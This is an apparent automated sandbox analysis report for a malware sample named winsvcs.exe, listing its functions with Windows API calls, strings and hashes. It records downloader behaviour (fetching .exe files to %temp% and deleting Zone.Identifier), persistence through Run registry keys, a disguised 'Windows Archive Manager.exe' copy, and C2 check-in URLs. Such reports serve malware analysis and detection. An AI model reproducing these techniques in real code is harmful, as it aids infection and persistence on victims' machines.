Function 00402DF9 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00402E27
memset.MSVCRT ref: 00402E3D
memset.MSVCRT ref: 00402E53
memset.MSVCRT ref: 00402E69
memset.MSVCRT ref: 00402E7F
_snwprintf.MSVCRT ref: 00402E9F
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00402EB8
GetTickCount.KERNEL32 ref: 00402EBE
srand.MSVCRT ref: 00402EC5
memset.MSVCRT ref: 00402ED9
rand.MSVCRT ref: 00402EE1
rand.MSVCRT ref: 00402EF5
_snwprintf.MSVCRT ref: 00402F21
InternetOpenW.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00402F36
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402F64
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00402F93
LoadImageA.USER32(00000000,?,00000207,?), ref: 00402FC5
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00402FF4
CloseHandle.KERNEL32(000000FF), ref: 00403002
_snwprintf.MSVCRT ref: 00403020
DeleteFileW.KERNEL32(?), ref: 0040302F
Sleep.KERNEL32(000001F4), ref: 0040303A
CloseHandle.KERNEL32(000000FF), ref: 00403061
InternetCloseHandle.WININET(00000000), ref: 0040306D
InternetCloseHandle.WININET(00000000), ref: 00403079
Sleep.KERNEL32(000001F4), ref: 00403084
memset.MSVCRT ref: 004030A7
rand.MSVCRT ref: 004030AF
rand.MSVCRT ref: 004030C3
_snwprintf.MSVCRT ref: 004030EF
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040310B
memset.MSVCRT ref: 00403122
_snwprintf.MSVCRT ref: 00403142
DeleteFileW.KERNEL32(?), ref: 00403151
Sleep.KERNEL32(000001F4), ref: 0040315C
ExitThread.KERNEL32 ref: 00403171

Strings

%ls:Zone.Identifier, xrefs: 00403131
%temp%, xrefs: 00402EB3
%ls:Zone.Identifier, xrefs: 0040300F
%ls\%d%d.exe, xrefs: 00402F10
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00402F31
%ls\%d%d.exe, xrefs: 004030DE
%hs, xrefs: 00402E8E

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: memset$File_snwprintf$CloseHandleInternetrand$Sleep$DeleteOpen$CountCreateDownloadEnvironmentExitExpandImageLoadStringsThreadTickWritesrand
String ID: %hs$%ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
API String ID: 1494052058-3583034578
Opcode ID: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
Instruction ID: 78f194360a85e13182315f20d4f49311ac3511ff64a984fe922711d5a5a3e9c0
Opcode Fuzzy Hash: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
Instruction Fuzzy Hash: D88157719803186AEB209B60DC4AFDA777CBF04705F1444B6B749F60D1DA785B84CF99

Function 00403DB3 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 183
registrysleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403DDB
memset.MSVCRT ref: 00403DF1
memset.MSVCRT ref: 00403E07
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
_snwprintf.MSVCRT ref: 00403E46
_snwprintf.MSVCRT ref: 00403E6D
PathFileExistsW.SHLWAPI(?), ref: 00403E7C
PathFileExistsW.SHLWAPI(?), ref: 00403E91
CreateDirectoryW.KERNEL32(?,00000000), ref: 00403EA4
CopyFileW.KERNEL32(?,?,00000000), ref: 00403EBA
Sleep.KERNEL32(000001F4), ref: 00403EDB
_snwprintf.MSVCRT ref: 00403F00
SetFileAttributesW.KERNEL32(?,00000007), ref: 00403FB0
SetFileAttributesW.KERNEL32(?,00000007), ref: 00403FBF
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00403FDD
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040405E
RegCloseKey.ADVAPI32(?), ref: 0040406A
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00404088
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00404109
RegCloseKey.ADVAPI32(?), ref: 00404115
Sleep.KERNEL32(000001F4), ref: 0040412D
ExitProcess.KERNEL32 ref: 00404135

Strings

Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
%ls\94000696690303050, xrefs: 00403E35
%ls:*:Enabled:%s, xrefs: 00403EEF
%ls\%ls, xrefs: 00403E5C

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: File$_snwprintfmemset$AttributesCloseExistsOpenPathSleepValue$CopyCreateDirectoryEnvironmentExitExpandProcessStrings
String ID: %ls:*:Enabled:%s$%ls\%ls$%ls\94000696690303050$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
API String ID: 2527662941-1033523944
Opcode ID: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
Instruction ID: f988062a3cac2b408eb3252422939997e0dc03c7f21b39b6b4153b48e23d4fb2
Opcode Fuzzy Hash: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
Instruction Fuzzy Hash: 98812675A002699EDB20DB54CC49BDAB3B8FB08305F0041EAF649F6191EB749AD4CF99

Function 004035E4 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 90
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004035FB
memset.MSVCRT ref: 00403611
memset.MSVCRT ref: 00403627
memset.MSVCRT ref: 0040363B
GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00403651
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00403668
GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 0040367A
GetTickCount.KERNEL32 ref: 00403680
srand.MSVCRT ref: 00403687
_snwprintf.MSVCRT ref: 004036A3
CopyFileW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,00000000), ref: 004036B9
SetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,00000080), ref: 004036CD
GetDriveTypeW.KERNEL32(?), ref: 004036F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00403711
ExitThread.KERNEL32 ref: 00403734

Strings

C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe, xrefs: 00403636, 0040369E, 004036AD, 004036C8
%ls\Windows Archive Manager.exe, xrefs: 00403694
%temp%, xrefs: 00403663

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: memset$File$DriveStrings$AttributesCopyCountCurrentDirectoryEnvironmentExitExpandLogicalModuleNameThreadTickType_snwprintfsrand
String ID: %ls\Windows Archive Manager.exe$%temp%$C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe
API String ID: 1005768253-3794033333
Opcode ID: b63559b0f90c80b58217091748f155997f69f41dcf91cb22f45ed2a401fd4725
Instruction ID: d69677a716828d0fd0f9714df326e3bc7eebc1e83e94ac9ad288232d9b6456d4
Opcode Fuzzy Hash: b63559b0f90c80b58217091748f155997f69f41dcf91cb22f45ed2a401fd4725
Instruction Fuzzy Hash: F1318AF1A407086BDB609B60DC4AF9F376CEB00701F1044B6F648F61D2DA789A848F68

Function 00402C41 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00402C56
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\94000696690303050\winsvcs.exe,00000208), ref: 00402C6A
Sleep.KERNEL32(000001F4), ref: 00402C75
_wfopen.MSVCRT ref: 00402C85
fseek.MSVCRT ref: 00402CA5
ftell.MSVCRT ref: 00402CB3
fclose.MSVCRT ref: 00402CC4
Sleep.KERNEL32(000001F4), ref: 00402CCF
memset.MSVCRT ref: 00402CE3
memset.MSVCRT ref: 00402CF9
GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 00402D0D
GetDriveTypeW.KERNEL32(?), ref: 00402D2D
SetErrorMode.KERNEL32(00000001), ref: 00402D56
GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,00000000,00000000,00000000), ref: 00402D75
GetDriveTypeW.KERNEL32(?), ref: 00402DAA
Sleep.KERNEL32(000003E8), ref: 00402DE8

Strings

C:\Windows\94000696690303050\winsvcs.exe, xrefs: 00402C51, 00402C63, 00402C80

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: DriveSleepmemset$Type$ErrorFileInformationLogicalModeModuleNameStringsVolume_wfopenfclosefseekftell
String ID: C:\Windows\94000696690303050\winsvcs.exe
API String ID: 2588250049-2072507633
Opcode ID: fc6aa94d807960d6bdd2ce83472f9c10149685f5be312d7016265bd8eaf1de08
Instruction ID: abd61d0839dc9ad5a3035ce58b77fb3bf3c2ac84987508875e7d16b0c097f562
Opcode Fuzzy Hash: fc6aa94d807960d6bdd2ce83472f9c10149685f5be312d7016265bd8eaf1de08
Instruction Fuzzy Hash: D3418671980248BBEB10AB90EE4EF9E77B4AF04701F6000B6F504F51E1DAB85E94DB59

Function 00401CDA Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 55
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401CF1
_snprintf.MSVCRT ref: 00401D15
_snprintf.MSVCRT ref: 00401D39
InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00401D4E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00401D78
Sleep.KERNEL32(000003E8), ref: 00401D86
InternetCloseHandle.WININET(00000001), ref: 00401D8F
InternetCloseHandle.WININET(00000000), ref: 00401D9B

Strings

%stldr.php?newinf=1, xrefs: 00401D04
%stldr.php?online=1, xrefs: 00401D28
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401D49

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: Internet$CloseHandleOpen_snprintf$Sleepmemset
String ID: %stldr.php?newinf=1$%stldr.php?online=1$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
API String ID: 3400190714-2874531546
Opcode ID: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
Instruction ID: 172d5a9b1eb5bcf93a70bdf7b9922c54f139c7de0db3159d92bce3780515f997
Opcode Fuzzy Hash: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
Instruction Fuzzy Hash: 9711A7B0E4031CBBEF11ABA0CD47FDA3A78AB04B04F1444B6B754B91E1D6B49A94CF59

Function 00401FAC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401FC3
memset.MSVCRT ref: 00401FD9
ExpandEnvironmentStringsW.KERNEL32(%appdata%,?,00000208), ref: 00401FF2
_snwprintf.MSVCRT ref: 00402010
PathFileExistsW.SHLWAPI(?), ref: 0040201F
_wfopen.MSVCRT ref: 00402035
fclose.MSVCRT ref: 00402051
SetFileAttributesW.KERNEL32(?,00000007), ref: 00402060

Strings

%ls\winsvcs_.txt, xrefs: 00401FFF
%appdata%, xrefs: 00401FED

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: Filememset$AttributesEnvironmentExistsExpandPathStrings_snwprintf_wfopenfclose
String ID: %appdata%$%ls\winsvcs_.txt
API String ID: 1073927619-2399589006
Opcode ID: 56c3ea8311b647faa11201189d7150c577c5e7a9f844502fc65c16921bd3f9ae
Instruction ID: 1a380fa9675f0f2fc8ef9a6445bbc20ecbefda1fb14ea0c07b927e82b87ac6b4
Opcode Fuzzy Hash: 56c3ea8311b647faa11201189d7150c577c5e7a9f844502fc65c16921bd3f9ae
Instruction Fuzzy Hash: 621137B194031C66DF20EB609D0EFDB73BCAB04704F0444B6B354F60D2EAB896C48E59

Function 0040104E Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 0040107B
__p__fmode.MSVCRT ref: 00401090
__p__commode.MSVCRT ref: 0040109E
__setusermatherr.MSVCRT ref: 004010CA
_initterm.MSVCRT ref: 004010E0
__getmainargs.MSVCRT ref: 00401103
_initterm.MSVCRT ref: 00401113
GetStartupInfoA.KERNEL32(?), ref: 00401152
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401176
exit.MSVCRT ref: 00401186
_XcptFilter.MSVCRT ref: 00401198

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: edeebd1106a7f388a772a7060f8ac46c09a25cb8c28ec28ec07484c77bacbd7a
Instruction ID: 94e1e2716a1ba341fd62adcb868f80db46b7d294d77747727738e79ab16cead9
Opcode Fuzzy Hash: edeebd1106a7f388a772a7060f8ac46c09a25cb8c28ec28ec07484c77bacbd7a
Instruction Fuzzy Hash: C7415CB1940744AFDB249FA4DA45AAE7BB8FB09710F20013FE681BB2A1D6785845CF58

Function 00401E97 Relevance: 9.1, APIs: 6, Instructions: 70
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00401EA4
Process32First.KERNEL32(000000FF,00000128), ref: 00401ECD

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
Instruction ID: 642ac0987f55ef775eea862af307b23bb9844e3de74e62916ff785c59642b288
Opcode Fuzzy Hash: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
Instruction Fuzzy Hash: 6B3134709002599FCF219B64CD847EABBB5AB18314F1002EAE949B62A1D7389F85DF08

Function 0040FCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePen.GDI32(00000000), ref: 0040FD85
CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
GetSysColor.USER32(00000005), ref: 0040FE0C

Strings

dD, xrefs: 0040FE36
Taho, xrefs: 0040FDE8

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Create$ColorFontIndirect
String ID: Taho$dD
API String ID: 4251253423-4141250355
Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

Function 00429B0C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00429B21

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

Function 02323894 Relevance: 1.5, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 023238B7

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction ID: 08a7b9baff2c096cadbc8aa9f430048f4fe2cb59e58b69867192f95db41d26bf
Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction Fuzzy Hash: 00E07E7590020CAFCF01DF94D94589DBBB5EB08200F008199ED54A6311D6319A20EF51

Function 02323904 Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0232391E

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction ID: 25f096fa0555684131f3f008669579ac6ba6fdf8ac01908b1af38dba58dd31b1
Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction Fuzzy Hash: BAD04274E0420CAF8B10EFA8D54589CFBF5EB08200F1081EAEC04A7311E631AA54DF91

Function 0040FC5D Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

Function 02323854 Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 02323877

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 1955a88034b233c830e439d634ba171ee265cd477c1fca3a199eedca0ddd729b
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: CFE07E7590020CAFCF01DF94D94589DBBB5EB08210F00809AED14A6311D6319A20EF51

Function 02320570 Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 02320593

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2320000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 8803953e8d309987c8e4462516c58ebaae07c227b49a507c8bb40378569f6afd
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: 1AE07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6211D6319A24AF91

Function 02323824 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02323844

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 67b608e004bc8f7c02685251dc1f56c87c3a45970fd000a210b671ab7df54968
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: 35E09275D0020CEF8F01DF94D84589CBBB5EB08210F008099EC14A7310D6319A60DF91

Function 02320540 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02320560

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2320000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: b6ecc2184bb6200fa674f2b11a1be03881e0ff84738faec177bf9e40ee607bda
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: A7E00275D4020CEF8B05DF98D94599DBBB5EB18310F10819AED1497311D6319A64DF91

Function 02323764 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 02323781

Memory Dump Source

Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: dc0da760ebe54f30e3be3d7d24c8f27b89beae46dc73ccdb8187a7f08e55289f
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction Fuzzy Hash: 44E02D79E0420CAF8B51EFA8D54589CFBB5EB08210F1081AAEC58A7311E631AA64DF91

Non-executed Functions

Function 00426E9B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EDA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
